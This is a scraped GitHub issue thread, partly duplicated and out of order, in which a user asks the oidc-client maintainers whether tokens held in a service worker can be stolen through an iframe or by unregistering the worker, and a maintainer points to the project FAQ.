Closed pgangwani closed 4 months ago
Good issue @pgangwani , I will detail a response + code + video very soon :)
The hidden FAQ give an answer : https://github.com/AxaFrance/oidc-client/blob/main/FAQ.md#good-security-practices--does-a-hacker-can-unregister-the-service-worker-and-retrieve-tokens-via-an-iframe-
Good issue @pgangwani , I will detail a response + code + video very soon :)
The hidden FAQ give an answer : https://github.com/AxaFrance/oidc-client/blob/main/FAQ.md#good-security-practices--does-a-hacker-can-unregister-the-service-worker-and-retrieve-tokens-via-an-iframe-
Nice information in hidden gem and apt reply to my security team. I understood. thanks for next detailed steps.
Issue and Steps to Reproduce
I got update from my security team that ietf.org is drafting some observation on service worker pattern called it "may be" secured which they previously claimed to be the most secured method. Now If you reed 7.4.1.1. Attacking the Service Worker specifically point number : 2 Prevent an attacker from acquiring a new set of tokens
payload-new-flow
Steps I got are:
This issue is just to validate and prove that we are good and safe with the service worker approach.
Versions
any version
Screenshots
Expected
No way any code in main or iframe code able to access any tokens in service worker approach
Actual
Need to test if expected is true
Additional Details